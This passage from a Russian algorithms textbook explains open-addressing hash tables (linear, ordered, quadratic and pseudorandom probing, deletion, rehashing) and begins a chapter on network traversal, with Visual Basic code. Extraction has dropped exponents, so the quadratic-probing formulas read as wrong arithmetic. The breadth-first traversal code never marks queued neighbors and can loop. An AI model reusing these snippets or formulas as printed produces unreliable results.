В табл. 11.1 приведена средняя длина успешных и безуспешных тестовых последовательностей, полученных в программе Linear для таблицы со 100 ячейками, элементы в которых находятся в диапазоне от 1 до 999. Из таблицы видно, что производительность алгоритма падает по мере заполнения таблицы. Является ли производительность приемлемой, зависит от того, как используется таблица. Если программа тратит большую часть времени на поиск значений, которые есть в таблице, то производительность может быть неплохой, даже если таблица практически заполнена. Если же программа часто ищет значения, которых нет в таблице, то производительность может быть очень низкой, если таблица переполнена.
Как правило, хеширование обеспечивает приемлемую производительность, не расходуя при этом слишком много памяти, если заполнено от 50 до 75 процентов таблицы. Если таблица заполнена больше, чем на 75 процентов, то производительность падает. Если таблица заполнена меньше, чем на 50 процентов, то она занимает больше памяти, чем это необходимо. Это делает открытую адресацию хорошим примером пространственновременного компромисса. Увеличивая хештаблицу, можно уменьшить время, необходимое для вставки или поиска элементов.
=======297
@Таблица 11.1. Длина успешной и безуспешной тестовых последовательностей
Первичная кластеризация
Линейная проверка имеет одно неприятное свойство, которое называется первичной кластеризацией (primary clustering). После добавления большого числа элементов в таблицу, возникает конфликт между новыми элементами и уже имеющимися кластерами, при этом для вставки нового элемента нужно обойти кластер, чтобы найти пустую ячейку.
Чтобы увидеть, как образуются кластеры, предположим, что вначале имеется пустая хештаблица, которая может содержать N элементов. Если выбрать случайное число и вставить его в таблицу, то вероятность того, что элемент займет любую заданную позицию P в таблице, равна 1/N.
При вставке второго случайно выбранного элемента, он может отобразиться на ту же позицию с вероятностью 1/N. Изза конфликта в этом случае он помещается в позицию P + 1. Также существует вероятность 1/N, что элемент и должен располагаться в позиции P + 1, и вероятность 1/N, что он должен находиться в позиции P - 1. Во всех этих трех случаях новый элемент располагается рядом с предыдущим. Таким образом, в целом существует вероятность 3/N того, что 2 элемента окажутся расположенными вблизи друг от друга, образуя небольшой кластер.
По мере роста кластера вероятность того, что следующие элементы будут располагаться вблизи кластера, возрастает. Если в кластере находится два элемента, то вероятность того, что очередной элемент присоединится к кластеру, равна 4/N, если в кластере четыре элемента, то эта вероятность равна 6/N, и так далее.
Что еще хуже, если кластер начинает расти, то его рост продолжается до тех пор, пока он не столкнется с соседним кластером. Два кластера сливаются, образуя кластер еще большего размера, который растет еще быстрее, сливается с другими кластерами и образует еще большие кластеры.
======298
В идеальном случае хештаблица должна быть наполовину пуста, и элементы в ней должны чередоваться с пустыми ячейками. Тогда с вероятностью 50 процентов алгоритм сразу же найдет пустую ячейку для нового добавляемого элемента. Также существует 50процентная вероятность того, что он найдет пустую ячейку после проверки всего лишь двух позиций в таблице. Средняя длина тестовой последовательности равна 0,5 * 1 + 0,5 * 2 = 1,5.
В наихудшем случае все элементы в таблице будут сгруппированы в один гигантский кластер. При этом все еще есть 50процентная вероятность того, что алгоритм сразу найдет пустую ячейку, в которую можно поместить новый элемент. Тем не менее, если алгоритм не найдет пустую ячейку на первом шаге, то поиск свободной ячейки потребует гораздо больше времени. Если элемент должен находиться на первой позиции кластера, то алгоритму придется проверить все элементы в кластере, чтобы найти свободную ячейку. В среднем для вставки элемента при таком распределении потребуется гораздо больше времени, чем когда элементы равномерно распределены по таблице.
На практике, степень кластеризации будет находиться между этими двумя крайними случаями. Вы можете использовать программу Linear для исследования эффекта кластеризации. Запустите программу и создайте хештаблицу со 100 ячейками, а затем добавьте 50 случайных элементов со значениями до 999. Вы обнаружите, что образовалось несколько кластеров. В одном из тестов 38 из 50 элементов стали частью кластеров. Если добавить еще 25 элементов к таблице, то большинство элементов будут входить в кластеры. В другом тесте 70 из 75 элементов были сгруппированы в кластеры.
Упорядоченная линейная проверка
При выполнении поиска в упорядоченном списке методом полного перебора, можно остановить поиск, если найдется элемент со значением большим, чем искомое. Так как при этом возможное положение искомого элемента уже позади, значит искомый элемент отсутствует в списке.
Можно использовать похожую идею при поиске в хештаблице. Предположим, что можно организовать элементы в хештаблице таким образом, что значения в каждой тестовой последовательности находятся в порядке возрастания. Тогда при выполнении тестовой последовательности во время поиска элемента можно прекратить поиск, если встретится элемент со значением, большим искомого. В этом случае позиция, в которой должен был бы находиться искомый элемент, уже осталась позади, и значит элемента нет в таблице.
Public Function LocateItem(Value As Long, pos As Integer, _
probes As Integer) As Integer
Dim new_value As Long
probes = 1
pos = (Value Mod m_NumEntries)
Do
new_value = m_HashTable(pos)
' Элемента в таблице нет.
If new_value = UNUSED Or probes > NumEntries Then
LocateItem = HASH_NOT_FOUND
pos = -1
Exit Function
End If
' Элемент найден или его нет в таблице.
If new_value >= Value Then Exit Do
pos = (pos + 1) Mod NumEntries
probes = probes + 1
Loop
If Value = new_value Then
LocateItem = HASH_FOUND
Else
LocateItem = HASH_NOT_FOUND
End If
End Function
Для того, чтобы этот метод работал, необходимо организовать элементы в хештаблице так, чтобы при выполнении тестовой последовательности они встречались в возрастающем порядке. Существует достаточно простой метод вставки элементов, который гарантирует такое расположение элементов.
Когда в таблицу вставляется новый элемент, для него выполняется тестовая последовательность. Если найдется свободная ячейка, то элемент вставляется в эту позицию и процедура завершена. Если встречается элемент, значение которого больше значения нового элемента, то они меняются местами и продолжается выполнение тестовой последовательности для большего элемента. При этом может встретиться элемент с еще большим значением. Тогда элементы снова меняются местами, и выполняется поиск нового местоположения для этого элемента. Этот процесс продолжается до тех пор, пока, в конце концов, не найдется свободная ячейка, при этом возможно несколько элементов меняются местами.
========299-300
Public Function InsertItem(ByVal Value As Long, pos As Integer,_ probes As Integer) As Integer
Dim new_value As Long
Dim status As Integer
' Проверить, заполнена ли таблица.
If m_NumUnused < 1 Then
' Поиск элемента.
status = LocateItem(Value, pos, probes)
If status = HASH_FOUND Then
InsertItem = HASH_FOUND
Else
InsertItem = HASH_TABLE_FULL
pos = -1
End If
Exit Function
End If
probes = 1
pos = (Value Mod m_NumEntries)
Do
new_value = m_HashTable(pos)
' Если значение найдено, поиск завершен.
If new_value = Value Then
InsertItem = HASH_FOUND
Exit Function
End If
' Если ячейка свободна, элемент должен находиться в ней.
If new_value = UNUSED Then
m_HashTable(pos) = Value
HashForm.TableControl(pos).Caption = Format$(Value)
InsertItem = HASH_INSERTED
m_NumUnused = m_NumUnused - 1
Exit Function
End If
' Если значение в ячейке таблицы больше значения
' элемента, поменять их местами и продолжить.
If new_value > Value Then
m_HashTable(pos) = Value
Value = new_value
End If
pos = (pos + 1) Mod NumEntries
probes = probes + 1
Loop
End Function
Программа Ordered демонстрирует открытую адресацию с упорядоченной линейной проверкой. Она идентична программе Linear, но использует упорядоченную хештаблицу.
В табл. 11.2 приведена средняя длина успешной и безуспешной тестовых последовательностей при использовании линейной и упорядоченной линейной проверок. Средняя длина успешной проверки для обоих методов почти одинакова, но в случае неуспеха упорядоченная линейная проверка выполняется намного быстрее. Разница в особенности заметна, если хештаблица заполнена более, чем на 70 процентов.
=========301
@Таблица 11.2. Длина поиска при использовании линейной и упорядоченной линейной проверки
В обоих методах для вставки нового элемента требуется примерно одинаковое число шагов. Чтобы вставить элемент K в таблицу, каждый из методов начинает с позиции (K Mod NumEntries) и перемещается по таблице до тех пор, пока не найдет свободную ячейку. Во время упорядоченного хеширования может потребоваться поменять вставляемый элемент на другие в его тестовой последовательности. Если элементы представляют собой записи большого размера, то на это может потребоваться больше времени, особенно если записи находятся на диске или какомлибо другом медленном запоминающем устройстве.
Упорядоченная линейная проверка определенно является лучшим выбором, если вы знаете, что программе придется совершать большое число безуспешных операций поиска. Если программа будет часто выполнять поиск элементов, которых нет в таблице, или элементы таблицы имеют большой размер и перемещать их достаточно сложно, то можно получить лучшую производительность при использовании неупорядоченной линейной проверки.
Квадратичная проверка
Один из способов уменьшить первичную кластеризацию состоит в том, чтобы использовать хешфункцию следующего вида:
Hash(K, P) = (K + P2) Mod N где P = 0, 1, 2, ...
Предположим, что при вставке элемента в хештаблицу он отображается в кластер, образованный другими элементами. Если элемент отображается в позицию возле начала кластера, то возникнет еще несколько конфликтов прежде, чем найдется свободная ячейка для элемента. По мере роста параметра P в тестовой функции, значение этой функции быстро меняется. Это означает, что позиция, в которую попадет элемент в конечном итоге, возможно, окажется далеко от кластера.
=======302
На рис. 11.8 показана хештаблица, содержащая большой кластер элементов. На нем также показаны тестовые последовательности, которые возникают при попытке вставить два различных элемента в позиции, занимаемые кластером. Обе эти тестовые последовательности заканчиваются в точке, которая не прилегает к кластеру, поэтому после вставки этих элементов размер кластера не увеличивается.
Следующий код демонстрирует поиск элемента с использованием квадратичной проверки (quadratic probing):
Public Function LocateItem(Value As Long, pos As Integer, probes As Integer) As Integer
Dim new_value As Long
probes = 1
pos = (Value Mod m_NumEntries)
Do
new_value = m_HashTable(pos)
' Элемент найден.
If new_value = Value Then
LocateItem = HASH_FOUND
Exit Function
End If
' Элемента нет в таблице.
If new_value = UNUSED Or probes > NumEntries Then
LocateItem = HASH_NOT_FOUND
pos = -1
Exit Function
End If
pos = (Value + probes * probes) Mod NumEntries
probes = probes + 1
Loop
End Function
Программа Quad демонстрирует открытую адресацию с использованием квадратичной проверки. Она аналогична программе Linear, но использует квадратичную, а не линейную проверку.
В табл. 11.3 приведена средняя длина тестовых последовательностей, полученных в программах Linear и Quad для хештаблицы со 100 ячейками, значения элементов в которой находятся в диапазоне от 1 до 999. Квадратичная проверка обычно дает лучшие результаты.
@Рис. 11.8. Квадратичная проверка
======303
@Таблица 11.3. Длина поиска при использовании линейной и квадратичной проверки
Квадратичная проверка также имеет некоторые недостатки. Изза способа формирования тестовой последовательности, нельзя гарантировать, что она обойдет все ячейки в таблице, что означает, что иногда в таблицу нельзя будет вставить элемент, даже если она не заполнена до конца.
Например, рассмотрим небольшую хештаблицу, состоящую всего из шести ячеек. Тестовая последовательность для числа 3 будет следующей:
3
3 + 12 = 4 = 4 (Mod 6)
3 + 22 = 7 = 1 (Mod 6)
3 + 32 = 12 = 0 (Mod 6)
3 + 42 = 19 = 1 (Mod 6)
3 + 52 = 28 = 4 (Mod 6)
3 + 62 = 39 = 3 (Mod 6)
3 + 72 = 52 = 4 (Mod 6)
3 + 82 = 67 = 1 (Mod 6)
3 + 92 = 84 = 0 (Mod 6)
3 + 102 = 103 = 1 (Mod 6)
и так далее.
Эта тестовая последовательность обращается к позициям 1 и 4 дважды перед тем, как обратиться к позиции 3, и никогда не попадает в позиции 2 и 5. Чтобы пронаблюдать этот эффект, создайте в программе Quad хештаблицу с шестью ячейками, а затем вставьте элементы 1, 3, 4, 6 и 9. Программа определит, что таблица заполнена целиком, хотя две ячейки и остались неиспользованными. Тестовая последовательность для элемента 9 не обращается к элементам 2 и 5, поэтому программа не может вставить в таблицу новый элемент.
=======304
Можно показать, что квадратичная тестовая последовательность будет обращаться, по меньшей мере, к N/2 ячеек таблицы, если размер таблицы N — простое число. Хотя при этом гарантируется некоторый уровень производительности, все равно могут возникнуть проблемы, если таблица почти заполнена. Так как производительность для почти заполненной таблицы в любом случае сильно падает, то возможно лучше будет просто увеличить размер хеш-таблицы, а не беспокоиться о том, сможет ли тестовая последовательность найти свободную ячейку.
Не столь очевидная проблема, которая возникает при применении квадратичной проверки, заключается в том, что хотя она устраняет первичную кластеризацию, во время нее может возникать похожая проблема, которая называется вторичной кластеризацией (secondary clustering). Если два элемента отображаются в одну ячейку, для них будет выполняться одна и так же тестовая последовательность. Если множество элементов отображаются на одну из ячеек таблицы, они образуют вторичный кластер, который распределен по хештаблице. Если появляется новый элемент с тем же самым начальным значением, для него приходится выполнять длительную тестовую последовательность, прежде чем он обойдет элементы во вторичном кластере.
На рис. 11.9 показана хештаблица, которая может содержать 10 ячеек. В таблице находятся элементы 2, 12, 22 и 32, которые все изначально отображаются в позицию 2. Если попытаться вставить в таблицу элемент 42, то нужно будет выполнить длительную тестовую последовательность, которая обойдет все эти элементы, прежде чем найдет свободную ячейку.
Псевдослучайная проверка
Степень кластеризации растет, если в кластер добавляются элементы, которые отображаются на уже занятые кластером ячейки. Вторичная кластеризация возникает, когда для элементов, которые первоначально должны занимать одну и ту же ячейку, выполняется одна и та же тестовая последовательность, и образуется вторичный кластер, распределенный по хештаблице. Можно устранить оба эти эффекта, если сделать так, чтобы для разных элементов выполнялись различные тестовые последовательности, даже если элементы первоначально и должны были занимать одну и ту же ячейку.
Один из способов сделать это заключается в использовании в тестовой последовательности генератора псевдослучайных чисел. Для вычисления тестовой последовательности для элемента, его значение используется для инициализации генератора случайных чисел. Затем для построения тестовой последовательности используются последовательные случайные числа, получаемые на выходе генератора. Это называется псевдослучайной проверкой (pseudorandom probing).
Когда позднее требуется найти элемент в хештаблице, генератор случайных чисел снова инициализируется значением элемента, при этом на выходе генератора мы получим ту же самую последовательность чисел, которая использовалась для вставки элемента в таблицу. Используя эти числа, можно воссоздать исходную тестовую последовательность и найти элемент.
@Рис. 11.9. Вторичная кластеризация
==========305
Если используется качественный генератор случайных чисел, то разные значения элементов будут давать различные случайные числа и соответственно разные тестовые последовательности. Даже если два значения изначально отображаются на одну и ту же ячейку, то следующие позиции в тестовой последовательности будут уже различными. В этом случае в хештаблице не будет возникать первичная или вторичная кластеризация.
Можно проинициализировать генератор случайных чисел Visual Basic, используя начальное число, при помощи двух строчек кода:
Rnd -1
Randomize seed_value
Оператор Rnd дает одну и ту же последовательность чисел после инициализации одним и тем же начальным числом. Следующий кода показывает, как можно выполнять поиск элемента с использованием псевдослучайной проверки:
Public Function LocateItem(Value As Long, pos As Integer, _
probes As Integer) As Integer
Dim new_value As Long
' Проинициализировать генератор случайных чисел.
Rnd -1
Randomize Value
probes = 1
pos = Int(Rnd * m_NumEntries)
Do
new_value = m_HashTable(pos)
' Элемент найден.
If new_value = Value Then
LocateItem = HASH_FOUND
Exit Function
End If
' Элемента нет в таблице.
If new_value = UNUSED Or probes > NumEntries Then
LocateItem = HASH_NOT_FOUND
pos = -1
Exit Function
End If
pos = Int(Rnd * m_NumEntries)
probes = probes + 1
Loop
End Function
=======306
Программа Rand демонстрирует открытую адресацию с псевдослучайной проверкой. Она аналогична программам Linear и Quad, но использует псевдослучайную, а не линейную или квадратичную проверку.
В табл. 11.4 приведена примерная средняя длина тестовой последовательности, полученной в программах Quad или Rand для хештаблицы со 100 ячейками и элементами, значения которых находятся в диапазоне от 1 до 999. Обычно псевдослучайная проверка дает наилучшие результаты, хотя разница между псевдослучайной и квадратичной проверками не так велика, как между линейной и квадратичной.
Псевдослучайная проверка также имеет свои недостатки. Так как тестовая последовательность выбирается псевдослучайно, нельзя точно предсказать, насколько быстро алгоритм обойдет все элементы в таблице. Если таблица меньше, чем число возможных псевдослучайных значений, то существует вероятность того, что тестовая последовательность обратится к одному значению несколько раз до того, как она выберет другие значения в таблице. Возможно также, что тестовая последовательность будет пропускать какуюлибо ячейку в таблице и не сможет вставить новый элемент, даже если таблица не заполнена до конца.
Так же, как и в случае квадратичной проверки, эти эффекты могут вызвать затруднения, только если таблица почти заполнена. В этом случае увеличение таблицы дает гораздо больший прирост производительности, чем поиск неиспользуемых ячеек таблицы.
@Рис. 11.4. Длина поиска при использовании квадратичной и псевдослучайной проверки
=======307
Удаление элементов
Удаление элементов из хештаблицы, в которой используется открытая адресация, выполняется не так просто, как удаление их из таблицы, использующей связные списки или блоки. Просто удалить элемент из таблицы нельзя, так как он может находиться в тестовой последовательности другого элемента.
Предположим, что элемент A находится в тестовой последовательности элемента B. Если удалить из таблицы элемент A, найти элемент B будет невозможно. Во время поиска элемента B встретится пустая ячейка, которая осталась после удаления элемента A, поэтому будет сделан неправильный вывод о том, что элемент B отсутствует в таблице.
Вместо удаления элемента из хештаблицы можно просто пометить его как удаленный. Можно использовать эту ячейку позднее, если она встретится во время выполнения вставки нового элемента в таблицу. Если помеченный элемент встречается во время поиска другого элемента, он просто игнорируется и тестовая последовательность продолжится.
После того, как большое число элементов будет помечено как удаленные, в хештаблице может оказаться множество неиспользуемых ячеек, и при поиске элементов достаточно много времени будет уходить на пропуск удаленных элементов. В конце концов, может потребоваться рехеширование таблицы для освобождения неиспользуемой памяти.
Рехеширование
Чтобы освободить удаленные элементы из хештаблицы, можно выполнить ее рехеширование (rehashing) на месте. Чтобы этот алгоритм мог работать, нужно иметь какойто способ для определения, было ли выполнено рехеширование элемента. Простейший способ сделать это — определить элементы в виде структур данных, содержащих поле Rehashed.
Type ItemType
Value As Long
Rehashed As Boolean
End Type
Вначале присвоим полю Rehashed значение false. Затем выполним проход по таблице в поиске ячеек, которые не помечены как удаленные, и для которых еще не было выполнено рехеширование.
Если такой элемент встретится, то выполняется его удаление из таблицы и повторное хеширование, при этом выполняется обычная тестовая последовательность для элемента. Если встречается свободная или помеченная как удаленная ячейка, элемент размещается в ней, помечается как рехешированный, и продолжается проверка остальных элементов, для которых еще не было выполнено рехеширование.
Если при выполнении рехеширования найдется элемент, который уже был помечен как рехешированный, то тестовая последовательность продолжается. Если затем встретится элемент, для которого еще не было выполнено рехеширование, то элементы меняются местами, текущая ячейка помечается как рехешированная и процесс начинается снова.
======308
Изменение размера хештаблиц
Если хештаблица становится почти заполненной, производительность значительно падает. В этом случае может понадобиться увеличение размера таблицы, чтобы в ней было больше места для элементов. И наоборот, если в таблице слишком мало ячеек, может потребоваться уменьшить ее, чтобы освободить занимаемую память. Используя методы, похожие на те, которые использовались при рехешировании таблицы на месте, можно увеличивать и уменьшать размер хештаблицы.
Чтобы увеличить хештаблицу, вначале размер массива, в котором она находится, увеличивается при помощи оператора Dim Preserve. Затем выполняется рехеширование таблицы, при этом элементы могут занимать ячейки в созданной свободной области в конце таблицы. После завершения рехеширования таблица будет готова к использованию.
Чтобы уменьшить размер таблицы, вначале определим, сколько элементов должно содержаться в массиве таблицы после уменьшения. Затем выполняем рехеширование таблицы, причем элементы помещаются только в уменьшенную часть таблицы. После завершения рехеширования всех элементов, размер массива уменьшается при помощи оператора ReDim Preserve.
Следующий код демонстрирует рехеширование таблицы с использованием линейной проверки. Код для рехеширования таблицы с использованием квадратичной или псевдослучайной проверки выглядит почти так же:
Public Sub Rehash()
Dim i As Integer
Dim pos As Integer
Dim probes As Integer
Dim Value As Long
Dim new_value As Long
' Пометить все элементы как нерехешированные.
For i = 0 To NumEntries - 1
m_HashTable(i).Rehashed = False
Next i
' Поиск нерехешированных элементов.
For i = 0 To NumEntries - 1
If Not m_HashTable(i).Rehashed Then
Value = m_HashTable(i).Value
m_HashTable(i).Value = UNUSED
If Value <> DELETED And Value <> UNUSED Then
' Выполнить тестовую последовательность
' для этого элемента, пока не найдется свободная,
' удаленная или нерехешированная ячейка.
probes = 0
Do
pos = (Value + probes) Mod NumEntries
new_value = m_HashTable(pos).Value
' Если ячейка свободна или помечена как
' удаленная, поместить элемент в нее.
If new_value = UNUSED Or _
new_value = DELETED _
Then
m_HashTable(pos).Value = Value
m_HashTable(pos).Rehashed = True
Exit Do
End If
' Если ячейка не помечена как рехешированная,
' поменять их местами и продолжить.
If Not m_HashTable(pos).Rehashed Then
m_HashTable(pos).Value = Value
m_HashTable(pos).Rehashed = True
Value = new_value
probes = 0
Else
probes = probes + 1
End If
Loop
End If
End If
Next i
End Sub
Программа Rehash использует открытую адресацию с линейной проверкой. Она аналогична программе Linear, но позволяет также помечать объекты как удаленные и выполнять рехеширование таблицы.
Резюме
Различные типы хештаблиц, описанные в этой главе, имеют свои преимущества и недостатки.
Для хештаблиц, которые используют связные списки или блоки можно легко изменять размер таблицы и удалять из нее элементы. Использование блоков также позволяет легко работать с таблицами на диске, позволяя считать за одно обращение к диску сразу множество элементов данных. Тем не менее, оба эти метода являются более медленными, чем открытая адресация.
Линейная проверка проста и позволяет достаточно быстро вставлять и удалять элементы из таблицы. Применение упорядоченной линейной проверки позволяет быстрее, чем в случае неупорядоченной линейной проверки, установить, что элемент отсутствует в таблице. С другой стороны, вставку элементов в таблицу при этом выполнить сложнее.
Квадратичная проверка позволяет избежать кластеризации, которая характерна для линейной проверки, и поэтому обеспечивает более высокую производительность. Псевдослучайная проверка обеспечивает еще более высокую производительность, так как при этом удается избавиться как от первичной, так и от вторичной кластеризации.
В табл. 11.5 приведены преимущества и недостатки различных методов хеширования.
======310
@Таблица 11.5. Преимущества и недостатки различных методов хеширования
Выбор наилучшего метода хеширования для данного приложения зависит от данных задачи и способов их использования. При применении разных схем достигаются различные компромиссы между занимаемой памятью, скоростью и простотой изменений. Табл. 11.5 может помочь вам выбрать наилучший алгоритм для вашего приложения.
=======311
Глава 12. Сетевые алгоритмы
В 6 и 7 главах обсуждались алгоритмы работы с деревьями. Данная глава посвящена более общей теме сетей. Сети играют важную роль во многих приложениях. Их можно использовать для моделирования таких объектов, как сеть улиц, телефонная или электрическая сеть, водопровод, канализация, водосток, сеть авиаперевозок или железных дорог. Менее очевидна возможность использования сетей для решения таких задач, как разбиение на районы, составление расписания методом критического пути, планирование коллективной работы или распределения работы.
Определения
Как и в определении деревьев, сетью (network) или графом (graph) называется набор узлов (nodes), соединенных ребрами (edges) или связями (links). Для графа, в отличие от дерева, не определено понятие родительского или дочернего узла.
С ребрами сети может быть связано соответствующее направление, тогда в этом случае сеть называется ориентированной сетью (directed network). Для каждой связи можно также определить ее цену (cost). Для сети дорог, например, цена может быть равна времени, которое займет проезд по отрезку дороги, представленному ребром сети. В телефонной сети цена может быть равна коэффициенту электрических потерь в кабеле, представленном связью. На рис. 12.1 показана небольшая ориентированная сеть, в которой числа рядом с ребрами соответствуют цене ребра.
Путем (path) между узлами A и B называется последовательность ребер, которая связывает два этих узла между собой. Если между любыми двумя узлами сети есть не больше одного ребра, то путь можно однозначно описать, перечислив входящие в него узлы. Так как такое описание проще представить наглядно, то пути по возможности описываются таким образом. На рис. 12.1 путь, проходящий через узлы B, E, F, G,E и D, соединяет узлы B и D.
Циклом (cycle) называется путь который связывает узел с ним самим. Путь E, F, G, E на рис. 12.1 является циклом. Путь называется простым (simple), если он не содержит циклов. Путь B, E, F, G, E, D не является простым, так как он содержит цикл E, F, G, E.
Если существует какойлибо путь между двумя узлами, то должен существовать и простой путь между ними. Этот путь можно найти, если удалить все циклы из исходного пути. Например, если заменить цикл E, F, G, E в пути B, E, F, G, E, D на узел E, то получится простой путь B, E, D, связывающий узлы B и D.
=======313
@Рис. 12.1. Ориентированная сеть с ценой ребер
Сеть называется связной (connected), если между любыми двумя узлами существует хотя бы один путь. В ориентированной сети не всегда очевидно, является ли сеть связной. На рис. 12.2 сеть слева является связной. Сеть справа не является связной, так как не существует пути из узла E в узел C.
Представления сети
В 6 главе было описано несколько представлений деревьев. Большинство из них применимо также и для работы с сетями. Например, представления полными узлами, списком потомков (списком соседей для сетей) или нумерацией связей также могут использоваться для хранения сетей. За описанием этих представлений обратитесь к 6 главе.
@Рис. 12.2. Связная (слева) и несвязная (справа) сети
======314
Для различных приложений могут лучше подходить разные представления сети. Представление полными узлами обеспечивает хорошие результаты, если каждый узел в сети связан с небольшим числом ребер. Представление списком соседних узлов обеспечивает большую гибкость, чем представление полными узлами, а представление нумерацией связей, хотя его сложнее модифицировать, обеспечивает более высокую производительность.
Кроме этого, некоторые варианты представления ребер могут упростить работу с определенными типами сетей. Эти представления используют один класс для узлов и другой — для представления связей. Применение класса для связей облегчает работу со свойствами связей, такими, как цена связи.
Например, ориентированная сеть с ценой связей может использовать следующее определения для класса узла:
Public Id As Integer ' Номер узла.
Public Links As Collection ' Связи, ведущие к соседним узлам.
Можно использовать следующее определение класса связей:
Public ToNode As NetworkNode ' Узел на другом конце связи.
Public Cost As Integer ' Цена связи.
Используя эти определения, программа может найти связь с наименьшей ценой, используя следующий код:
Dim link As NetworkLink
Dim best_link As NetworkLink
Dim best_cost As Integer
best_cost = 32767
For Each link In node.Links
If link.cost < best_cost Then
Set best_link = link
best_cost = link.cost
End If
Next link
Классы node и link часто расширяются для удобства работы с конкретными алгоритмами. Например, к классу node часто добавляется флаг Marked. Если программа обращается к узлу, то она устанавливает значение поля Marked равным true, чтобы знать, что узел уже был проверен.
Программа, управляющая неориентированной сетью, может использовать немного другое представление. Класс node остается тем же, что и раньше, но класс link включает ссылку на оба узла на концах связи.
Public Node1 As NetwokNode ' Один из узлов на конце связи.
Public Node2 As NetwokNode ' Другой узел.
Public Cost As Integer ' Цена связи.
Для неориентированной сети, предыдущее представление использовало бы два объекта для представления каждой связи — по одному для каждого из направлений связи. В новой версии каждая связь представлена одним объектом. Это представление достаточно наглядно, поэтому оно используется далее в этой главе.
=======315
Используя это представление, программа NetEdit позволяет оперировать неориентированными сетями с ценой связей. Меню File (Файл) позволяет загружать и сохранять сети в файлах. Команды в меню Edit (Правка) позволяют вам вставлять и удалять узлы и связи. На рис. 12.3 показано окно программы NetEdit.
Директория OldSrc\Ch12 содержит программы, которые используют представление нумерацией связей. Эти программы немного сложнее понять, но они обычно работают быстрее. Они не описаны в тексте, но использованные в них методы похожи на те, которые применялись в программах, написанных для 4 версии Visual Basic. Например, обе программы Src\Ch12\Paths и OldSrc\Ch12\Paths находят кратчайший маршрут, используя описанный ниже алгоритм установки меток. Основное отличие между ними заключается в том, что первая программа использует коллекции и классы, а вторая — псевдоуказатели и представление нумерацией связей.
Оперирование узлами и связями
Корень дерева — это единственный узел, не имеющий родителя. Можно найти любой узел в сети, начав от корня и следуя по указателям на дочерние узлы. Таким образом, узел представляет основание дерева. Если ввести переменную, которая будет содержать указатель на корневой узел, то впоследствии можно будет получить доступ ко всем узлам в дереве.
Сети не всегда содержат узел, который занимает такое особое положение. В несвязной сети может не существовать способа обойти все узлы по связям, начав с одного узла.
Поэтому программы, работающие с сетями, обычно содержат полный список всех узлов в сети. Программа также может хранить полный список всех связей. При помощи этих списков можно легко выполнить какиелибо действия над всеми узлами или связями в сети. Например, если программа хранит указатели на узлы и связи в коллекциях Nodes и Links, она может вывести сеть на экран при помощи следующего метода:
@Рис. 12.3. Программа NetEdit
=======316
Dim node As NetworkNode
dim link As NetworkLink
For Each link in links
' Нарисовать связь.
:
Next link
For Each node in nodes
' Нарисовать узел.
:
Next node
Программа NetEdit использует коллекции Nodes и Links для вывода сетей на экран.
Обходы сети
Обход сети выполняется аналогично обходу дерева. Можно обходить сеть, используя либо обход в глубину, либо обход в ширину. Обход в ширину обычно похож на прямой обход дерева, хотя для сетей можно определить также обратный и даже симметричный обход.
Алгоритм для выполнения прямого обхода двоичного дерева, описанный в 6 главе, формулируется так:
Обратиться к узлу.
Выполнить рекурсивный прямой обход левого поддерева.
Выполнить рекурсивный прямой обход правого поддерева.
В дереве между связанными между собой узлами существует отношение родительпотомок. Так как алгоритм начинается с корневого узла и всегда выполняется сверху вниз, он не обращается дважды ни к одному узлу.
В сети узлы не обязательно связаны в направлении сверху вниз. Если попытаться применить к сети алгоритм прямого обхода, может возникнуть бесконечный цикл.
Чтобы избежать этого, алгоритм должен помечать узел после обращения к нему, при этом при поиске в соседних узлах, обращение происходит только к узлам, которые еще не были помечены. После того, как алгоритм завершит работу, все узлы в сети будут помечены (если сеть является связной). Алгоритм прямого обхода сети формулируется так:
Пометить узел.
Обратиться к узлу.
Выполнить рекурсивный обход не помеченных соседних узлов.
========317
В Visual Basic можно добавить флаг Marked к классу NetworkNode.
Public Id As Long
Public Marked As Boolean
Public Links As Collection
Класс NetworkNode может включать открытую процедуру для обхода сети, начиная с этого узла. Процедура узла PreorderPrint обращается ко всем непомеченным узлам, которые доступны из данного узла. Если сеть является связной, то при таком обходе произойдет обращение ко всем узлам сети.
Public Sub PreorderPrint()
Dim link As NoworkLink
Dim node As NetworkNode
' Пометить узел.
Marked = True
' Обратиться к непомеченным узлам.
For Each link In Links
' Найти соседний узел.
If link.Node1 Is Me Then
Set node = link.Node2
Else
Set node = link.Node1
End If
' Определить, требуется ли обращение к соседнему узлу.
If Not node.Marked Then node.PreorderPrint
Next link
End Sub
Так как эта процедура не обращается ни к одному узлу дважды, то коллекция обходимых связей не содержит циклов и образует дерево.
Если сеть является связной, то дерево будет обходить все узлы сети. Так как это дерево охватывает все узлы сети, то оно называется остовным деревом (spanning tree). На рис. 12.4 показана небольшая сеть с остовным деревом с корнем в узле A, которое изображено жирными линиями.
Можно использовать похожий подход с пометкой узлов для преобразования обхода дерева в ширину в сетевой алгоритм. Алгоритм обхода дерева начинается с помещения корневого узла в очередь. Затем первый узел удаляется из очереди, происходит обращение к узлу, и затем в конце очереди помещаются его дочерние узлы. Затем этот процесс повторяется до тех пор, пока очередь не опустеет.
======318
@Рис. 12.4. Остовное дерево
В алгоритме обхода сети нужно вначале убедиться, что узел не проверялся раньше или он уже не находится в очереди. Для этого мы помечаем каждый узел, который помещается в очередь. Сетевая версия этого алгоритма выглядит так:
Пометить первый узел (который будет корнем остовного дерева) и добавить его в конец очереди.
Повторять следующие шаги до тех пор, пока очередь не опустеет:
Удалить из очереди первый узел и обратиться к нему.
Для каждого из непомеченных соседних узлов, пометить его и добавить в конец очереди.
Следующая процедура печатает список узлов сети в порядке обхода в ширину:
Public Sub BreadthFirstPrint(root As NetworkNode)
Dim queue As New Collection
Dim node As NetworkNode
Dim neighbor As NetworkNode
Dim link As NetworkLink
' Поместить корень в очередь.
root.Marked = True
queue.Add root
' Многократно помещать верхний элемент в очередь
' пока очередь не опустеет.
Do While queue.Count > 0
' Выбрать следующий узел из очереди.
Set node = queue.Item(1)
queue.Remove 1
' Обратиться к узлу.
Print node.Id
' Добавить в очередь все непомеченные соседние узлы.
For Each link In node.Links
' Найти соседний узел.
If link.Node1 Is Me Then
Set neighbor = link.Node2
Else
Set neighbor = link.Node1
End If
' Проверить, нужно ли обращение к соседнему узлу.
If Not neighbor.Marked Then queue.Add neighbor
Next link
Loop
End Sub
Наименьшие остовные деревья
Если задана сеть с ценой связей, то наименьшим остовным деревом (minimal spanning tree) называется остовное дерево, в котором суммарная цена всех связей в дереве будет наименьшей. Наименьшее остовное дерево можно использовать, чтобы связать все узлы в сети путем с наименьшей ценой.
